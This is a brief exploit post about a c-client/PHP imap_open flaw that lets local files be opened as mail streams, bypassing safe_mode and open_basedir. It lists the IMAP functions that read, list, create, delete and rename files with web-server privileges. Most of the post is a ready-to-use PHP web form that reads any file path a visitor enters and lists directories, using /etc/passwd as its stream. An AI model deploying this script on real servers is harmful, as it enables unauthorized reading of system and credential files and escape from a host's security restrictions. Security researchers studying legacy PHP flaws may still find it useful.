Vulnerability in c-client library (tested with versions 2000,2001,2004), mail_open could be used to open stream to local files. For php and imap module imap_open allow to bypass safemode and open_basedir restrictions. Use imap_body or others to view a file and imap_list to recursively list a directory. s/mailbox/file :) imap_createmailbox imap_deletemailbox imap_renamemailbox to create,delete,rename files with apache privileges. ##### code ##### <form action="" method="post"> <select name="switch"> <option selected="selected" value="file">View file</option> <option value="dir">View dir</option> </select> <input type="text" size="60" name="string"> <input type="submit" value="go"> </form> <?php $string = !empty($_POST['string']) ? $_POST['string'] : 0; $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; if ($string && $switch == "file") { $stream = imap_open($string, "", ""); if ($stream == FALSE) die("Can't open imap stream"); $str = imap_body($stream, 1); if (!empty($str)) echo "<pre>".$str."</pre>"; imap_close($stream); } elseif ($string && $switch == "dir") { $stream = imap_open("/etc/passwd", "", ""); if ($stream == FALSE) die("Can't open imap stream"); $string = explode("|",$string); if (count($string) > 1) $dir_list = imap_list($stream, trim($string[0]), trim($string[1])); else $dir_list = imap_list($stream, trim($string[0]), "*"); echo "<pre>"; for ($i = 0; $i < count($dir_list); $i++) echo "$dir_list[$i]\n"; echo "</pre>"; imap_close($stream); } ?> ################